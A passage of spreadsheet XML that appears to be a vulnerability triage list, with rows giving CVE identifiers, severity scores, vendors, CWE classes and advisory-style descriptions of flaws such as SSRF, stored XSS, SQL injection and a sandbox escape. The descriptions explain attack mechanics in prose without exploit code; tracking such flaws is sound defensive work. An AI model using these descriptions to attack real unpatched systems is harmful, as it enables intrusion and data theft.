      <c r="H981" s="5" t="inlineStr"/>
      <c r="I981" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J981" s="5" t="inlineStr"/>
      <c r="K981" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L981" s="5" t="inlineStr">
        <is>
          <t>Headroom's LLM proxy lets a client choose the upstream destination with the x-headroom-base-url request header. _resolve_openai_upstream_base in headroom/proxy/handlers/openai.py accepts the header value, requires only that it parse with an http or https scheme and a hostname, and returns it for use as the upstream base; _select_passthrough_base_url in headroom/providers/proxy_routes.py reads the same header for the passthrough routes. No check rejects loopback, link-local, or RFC 1918 destinations, and because the component is a proxy the upstream response is returned to the caller, so the request reaches internal services and cloud metadata addresses and their responses are disclosed. The Authorization header accompanying the request is forwarded unchanged to the caller-designated host. The pip console script binds 127.0.0.1 by default, but the reference docker-compose.yml ships --host 0.0.0.0 with published ports and no required HEADROOM_PROXY_TOKEN, which the server itself warns about at startup, so a deployment following the shipped compose exposes the affected data-plane routes to the network without authentication.</t>
        </is>
      </c>
      <c r="M981" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77775</t>
        </is>
      </c>
    </row>
    <row r="982">
      <c r="A982" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B982" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77909</t>
        </is>
      </c>
      <c r="C982" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D982" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E982" s="5" t="inlineStr"/>
      <c r="F982" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G982" s="5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="H982" s="5" t="inlineStr"/>
      <c r="I982" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J982" s="5" t="inlineStr"/>
      <c r="K982" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L982" s="5" t="inlineStr">
        <is>
          <t>Insufficiently protected credentials in Azure CycleCloud allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M982" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77909</t>
        </is>
      </c>
    </row>
    <row r="983">
      <c r="A983" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B983" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78623</t>
        </is>
      </c>
      <c r="C983" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D983" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E983" s="5" t="inlineStr"/>
      <c r="F983" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G983" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H983" s="5" t="inlineStr"/>
      <c r="I983" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J983" s="5" t="inlineStr"/>
      <c r="K983" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L983" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M983" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78623</t>
        </is>
      </c>
    </row>
    <row r="984">
      <c r="A984" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B984" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81210</t>
        </is>
      </c>
      <c r="C984" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D984" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E984" s="5" t="inlineStr"/>
      <c r="F984" s="5" t="inlineStr"/>
      <c r="G984" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H984" s="5" t="inlineStr"/>
      <c r="I984" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J984" s="5" t="inlineStr"/>
      <c r="K984" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L984"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M984" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81210</t>
        </is>
      </c>
    </row>
    <row r="985">
      <c r="A985" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B985" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81832</t>
        </is>
      </c>
      <c r="C985" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D985" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E985" s="5" t="inlineStr"/>
      <c r="F985" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G985" s="5" t="inlineStr">
        <is>
          <t>ibm, sap</t>
        </is>
      </c>
      <c r="H985" s="5" t="inlineStr">
        <is>
          <t>ibm:app_connect_enterprise, ibm:integration_bus_for_z\/os</t>
        </is>
      </c>
      <c r="I985" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J985" s="5" t="inlineStr"/>
      <c r="K985" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="L985" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.28 and IBM Integration Bus for z/OS 10.1.0.0 through 10.1.0.7 SAP Adapter is vulnerable to an XML external entity (XXE) attack.</t>
        </is>
      </c>
      <c r="M985" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81832</t>
        </is>
      </c>
    </row>
    <row r="986">
      <c r="A986" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B986" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84256</t>
        </is>
      </c>
      <c r="C986" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D986" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E986" s="5" t="inlineStr"/>
      <c r="F986" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G986" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H986" s="5" t="inlineStr"/>
      <c r="I986" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J986" s="5" t="inlineStr"/>
      <c r="K986" s="5" t="inlineStr">
        <is>
          <t>CWE-78, CWE-88</t>
        </is>
      </c>
      <c r="L986" s="5" t="inlineStr">
        <is>
          <t>An argument parsing issue in OpenVPN 2.1_rc10 through 2.6.22 and 2.7_alpha1 through 2.7.6 on Windows allows remote authenticated users to execute arbitrary commands via a crafted certificate subject</t>
        </is>
      </c>
      <c r="M986" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84256</t>
        </is>
      </c>
    </row>
    <row r="987">
      <c r="A987" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B987" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87996</t>
        </is>
      </c>
      <c r="C987" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D987" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E987" s="5" t="inlineStr"/>
      <c r="F987" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G987" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H987" s="5" t="inlineStr"/>
      <c r="I987" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J987" s="5" t="inlineStr"/>
      <c r="K987" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-918</t>
        </is>
      </c>
      <c r="L987" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.6 until 0.11.1, SafePlaywrightURLLoader in backend/open_webui/retrieval/web/utils.py validated a user-controlled hostname in Python and then let the Playwright browser resolve it again in the sync and async request interceptors. An authenticated user controlling authoritative DNS could return a public address to validation and an internal address to the browser, exposing responses from internal services or cloud metadata through web search or URL ingestion. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="M987" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87996</t>
        </is>
      </c>
    </row>
    <row r="988">
      <c r="A988" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B988" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47666</t>
        </is>
      </c>
      <c r="C988" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D988" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E988" s="5" t="inlineStr"/>
      <c r="F988" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G988" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H988" s="5" t="inlineStr"/>
      <c r="I988" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J988" s="5" t="inlineStr"/>
      <c r="K988" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L988" s="5" t="inlineStr">
        <is>
          <t>Penpot is an open-source design and prototyping platform. In versions up to and including 2.14.3, Penpot is vulnerable to stored cross-site scripting through custom font family names, which are interpolated into a @font-face CSS rule and injected into the page as HTML without sanitization. Because the backend accepts an arbitrary font-family string and the frontend writes the resulting style through innerHTML, a name containing markup such as a closing style tag followed by a script can break out of the style element and execute JavaScript on the Penpot origin. The attack is passive: any team member who opens a file referencing the malicious font triggers script execution simply by rendering the page, allowing theft of session cookies, actions performed as the victim, and access to their files and projects. This issue is fixed in version 2.15.3.</t>
        </is>
      </c>
      <c r="M988" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47666</t>
        </is>
      </c>
    </row>
    <row r="989">
      <c r="A989" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B989" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53958</t>
        </is>
      </c>
      <c r="C989" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D989" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E989" s="5" t="inlineStr"/>
      <c r="F989" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G989" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H989" s="5" t="inlineStr"/>
      <c r="I989" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J989" s="5" t="inlineStr"/>
      <c r="K989" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-915</t>
        </is>
      </c>
      <c r="L989" s="5" t="inlineStr">
        <is>
          <t>4gaBoards is a boards system for realtime project management. Prior to 3.3.9, 4gaBoards allows an authenticated user to modify ssoGoogleId, ssoGoogleEmail, ssoGithubId, ssoGithubUsername, ssoGithubEmail, ssoMicrosoftId, ssoMicrosoftEmail, ssoOidcId, and ssoOidcEmail through PATCH /api/users/:id. The whitelist in server/api/controllers/users/update.js mass assigns these backend-managed identity attributes from user input. An attacker can place a victim's provider identifier on an attacker-controlled account, causing the default lookup in helpers such as server/api/helpers/users/get-create-one-for-github-sso.js to match the victim's first SSO login to the attacker's account before the email-linkage flow runs. The victim is logged into the attacker-controlled account, and projects, boards, or data the victim creates remain accessible through the attacker's original local credentials. This issue is fixed in version 3.3.9.</t>
        </is>
      </c>
      <c r="M989" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53958</t>
        </is>
      </c>
    </row>
    <row r="990">
      <c r="A990" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B990" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54245</t>
        </is>
      </c>
      <c r="C990" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D990" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E990" s="5" t="inlineStr"/>
      <c r="F990" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G990" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H990" s="5" t="inlineStr"/>
      <c r="I990" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J990" s="5" t="inlineStr"/>
      <c r="K990" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L990" s="5" t="inlineStr">
        <is>
          <t>Fleet is an open-source device management platform built on osquery. In versions prior to 4.86.2, the Okta conditional access integration in Fleet Premium is vulnerable to SQL injection through a host-supplied value that is used in a database query without proper parameterization, allowing an attacker who controls a single enrolled host to read or modify arbitrary data in the Fleet database. The value is reported by the host's own agent and stored verbatim, then used on an unauthenticated request path that supports the conditional access integration, so any party controlling one enrolled host, the lowest-privilege position in the product, can influence the query. By disclosing arbitrary database contents an attacker can extract stored session tokens and replay them to act as a global administrator, and on a managed fleet that administrator access enables running scripts on enrolled hosts, leading to remote code execution. The issue requires Fleet Premium with the Okta conditional access integration enabled and does not affect instances where it is not configured. This issue is fixed in version 4.86.2.</t>
        </is>
      </c>
      <c r="M990" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54245</t>
        </is>
      </c>
    </row>
    <row r="991">
      <c r="A991" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B991" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70454</t>
        </is>
      </c>
      <c r="C991" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D991" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E991" s="5" t="inlineStr"/>
      <c r="F991" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G991" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H991" s="5" t="inlineStr"/>
      <c r="I991" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J991" s="5" t="inlineStr"/>
      <c r="K991" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L991" s="5" t="inlineStr">
        <is>
          <t>rsync 3.2.0 through 3.2.3 (openssl mode) and rsync-ssl through 3.4.4 (stunnel mode) contain a TLS certificate validation vulnerability that allows on-path attackers to intercept encrypted sessions by presenting self-signed or otherwise invalid certificates. Attackers can exploit the failure to validate server TLS certificates against a trusted CA or verify certificate hostname matching to decrypt or tamper with rsync session content without detection by the client.</t>
        </is>
      </c>
      <c r="M991" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70454</t>
        </is>
      </c>
    </row>
    <row r="992">
      <c r="A992" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B992" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71048</t>
        </is>
      </c>
      <c r="C992" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D992" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E992" s="5" t="inlineStr"/>
      <c r="F992" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G992" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H992" s="5" t="inlineStr">
        <is>
          <t>oracle:product_lifecycle_analytics</t>
        </is>
      </c>
      <c r="I992" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J992" s="5" t="inlineStr"/>
      <c r="K992" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L992" s="5" t="inlineStr">
        <is>
          <t>Vulnerability in the Oracle Product Lifecycle Analytics product of Oracle Supply Chain (component: Installation Issues).   The supported version that is affected is 3.6.1. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Product Lifecycle Analytics.  Successful attacks of this vulnerability can result in  unauthorized access to critical data or complete access to all Oracle Product Lifecycle Analytics accessible data as well as  unauthorized update, insert or delete access to some of Oracle Product Lifecycle Analytics accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Product Lifecycle Analytics. CVSS 3.1 Base Score 7.6 (Confidentiality, Integrity and Availability impacts).  CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L).</t>
        </is>
      </c>
      <c r="M992" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71048</t>
        </is>
      </c>
    </row>
    <row r="993">
      <c r="A993" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B993" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71327</t>
        </is>
      </c>
      <c r="C993" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D993" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E993" s="5" t="inlineStr"/>
      <c r="F993" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G993" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H993" s="5" t="inlineStr"/>
      <c r="I993" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J993" s="5" t="inlineStr"/>
      <c r="K993" s="5" t="inlineStr">
        <is>
          <t>CWE-694</t>
        </is>
      </c>
      <c r="L993" s="5" t="inlineStr">
        <is>
          <t>Traefik is an open source HTTP reverse proxy and load balancer. From 3.0.0 until 3.6.25 and 3.7.10, Traefik's Kubernetes Gateway API provider in pkg/provider/kubernetes/gateway/httproute.go, grpcroute.go, tcproute.go, and tlsroute.go builds HTTPRoute, GRPCRoute, TCPRoute, and TLSRoute router and service identities by hyphen-concatenating namespace, route name, Gateway identity, entry point, and rule index, allowing colliding Routes to overwrite another namespace's backend. This issue is fixed in 3.6.25 and 3.7.10.</t>
        </is>
      </c>
      <c r="M993" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71327</t>
        </is>
      </c>
    </row>
    <row r="994">
      <c r="A994" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B994" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73083</t>
        </is>
      </c>
      <c r="C994" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D994" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E994" s="5" t="inlineStr"/>
      <c r="F994" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G994" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H994" s="5" t="inlineStr"/>
      <c r="I994" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J994" s="5" t="inlineStr"/>
      <c r="K994" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L994" s="5" t="inlineStr">
        <is>
          <t>Activepieces is an open source AI workflow automation platform. Prior to 0.80.0, in SANDBOX_CODE_ONLY mode, the engine loads the compiled user module with importFresh(), a wrapper around Node.js require(), before the V8 isolate is applied. Top-level module code can therefore call require('child_process'), access fs, and use other Node.js APIs in the host engine process outside the sandbox. An authenticated user who can create a Code step can read environment secrets including AP_ENCRYPTION_KEY and AP_JWT_SECRET, read or write files, and reach internal services. This issue is fixed in version 0.80.0.</t>
        </is>
      </c>
      <c r="M994" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73083</t>
        </is>
      </c>
    </row>
    <row r="995">
      <c r="A995" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B995" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73408</t>
        </is>
      </c>
      <c r="C995" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D995" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E995" s="5" t="inlineStr"/>
      <c r="F995" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G995" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H995" s="5" t="inlineStr"/>
      <c r="I995" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J995" s="5" t="inlineStr"/>
      <c r="K995" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L995" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.39.18, packages/server/src/integrations/mysql.ts enabled multipleStatements and inserted an unescaped tableName into a DESCRIBE statement. An attacker able to create a MySQL table with a backtick and stacked statement in its name could wait for a Budibase administrator to run schema discovery, causing the second statement to execute. The fix applies quoteMySqlIdentifier before constructing the query. This issue is fixed in version 3.39.18.</t>
        </is>
      </c>
      <c r="M995" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73408</t>
        </is>
      </c>
    </row>
    <row r="996">
      <c r="A996" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B996" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82053</t>
        </is>
      </c>
      <c r="C996" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="D996" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E996" s="5" t="inlineStr"/>
      <c r="F996" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G996" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H996" s="5" t="inlineStr"/>
      <c r="I996" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J996" s="5" t="inlineStr"/>
      <c r="K996" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L996" s="5" t="inlineStr">
        <is>
          <t>A security issue exists in MongoDB's LDAP authorization integration where pooled LDAP connections can retain stale authentication identities after user authentication under certain configurations. Subsequent authorization queries may execute under an unintended LDAP identity rather than the expected one. This can result in incorrect role assignments based on the LDAP directory's access control configuration, potentially allowing an authenticated user to acquire elevated privileges that were not intended by the deployment's authorization policy.</t>
        </is>
      </c>
      <c r="M996" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82053</t>
        </is>
      </c>
    </row>
    <row r="997">
      <c r="A997" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B997" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-48431</t>
        </is>
      </c>
      <c r="C997" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D997" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E997" s="5" t="inlineStr"/>
      <c r="F997" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G997" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H997" s="5" t="inlineStr">
        <is>
          <t>apache:thrift</t>
        </is>
      </c>
      <c r="I997" s="5" t="inlineStr">
        <is>
          <t>2026-04-28</t>
        </is>
      </c>
      <c r="J997" s="5" t="inlineStr"/>
      <c r="K997" s="5" t="inlineStr">
        <is>
          <t>CWE-762, CWE-763</t>
        </is>
      </c>
      <c r="L997" s="5" t="inlineStr">
        <is>
          <t>Mismatched Memory Management Routines vulnerability in Apache Thrift c_glib language bindings.
This issue affects Apache Thrift: before 0.23.0.
Users are recommended to upgrade to version 0.23.0, which fixes the issue.
Description: Specially crafted requests can crash an c_glib-based Thrift server with a clean but fatal "free(): invalid pointer" error message.</t>
        </is>
      </c>
      <c r="M997" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-48431</t>
        </is>
      </c>
    </row>
    <row r="998">
      <c r="A998" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B998" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-69223</t>
        </is>
      </c>
      <c r="C998" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D998" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E998" s="5" t="inlineStr"/>
      <c r="F998" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G998" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H998" s="5" t="inlineStr">
        <is>
          <t>aiohttp:aiohttp</t>
        </is>
      </c>
      <c r="I998" s="5" t="inlineStr">
        <is>
          <t>2026-01-05</t>
        </is>
      </c>
      <c r="J998" s="5" t="inlineStr"/>
      <c r="K998" s="5" t="inlineStr">
        <is>
          <t>CWE-409, CWE-770</t>
        </is>
      </c>
      <c r="L998" s="5" t="inlineStr">
        <is>
          <t>AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Versions 3.13.2 and below allow a zip bomb to be used to execute a DoS against the AIOHTTP server. An attacker may be able to send a compressed request that when decompressed by AIOHTTP could exhaust the host's memory. This issue is fixed in version 3.13.3.</t>
        </is>
      </c>
      <c r="M998" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-69223</t>
        </is>
      </c>
    </row>
    <row r="999">
      <c r="A999" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B999" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13297</t>
        </is>
      </c>
      <c r="C999" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D999" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E999" s="5" t="inlineStr"/>
      <c r="F999" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G999" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H999" s="5" t="inlineStr"/>
      <c r="I999" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J999" s="5" t="inlineStr"/>
      <c r="K999" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L999" s="5" t="inlineStr">
        <is>
          <t>IBM Verify Identity Access Advanced Access Control may be vulnerable to an information disclosure attack.</t>
        </is>
      </c>
      <c r="M999" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13297</t>
        </is>
      </c>
    </row>
    <row r="1000">
      <c r="A1000" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1000" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17255</t>
        </is>
      </c>
      <c r="C1000" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1000" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1000" s="5" t="inlineStr"/>
      <c r="F1000" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1000" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1000" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I1000" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1000" s="5" t="inlineStr"/>
      <c r="K1000" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1000" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to cause a denial of service due to improper validation of the prefix length in ICMPv6 Router Advertisements.</t>
        </is>
      </c>
      <c r="M1000" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17255</t>
        </is>
      </c>
    </row>
    <row r="1001">
      <c r="A1001" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1001" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17470</t>
        </is>
      </c>
      <c r="C1001" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1001" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1001" s="5" t="inlineStr"/>
      <c r="F1001" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1001" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1001" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I1001" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1001" s="5" t="inlineStr"/>
      <c r="K1001" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1001" s="5" t="inlineStr">
        <is>
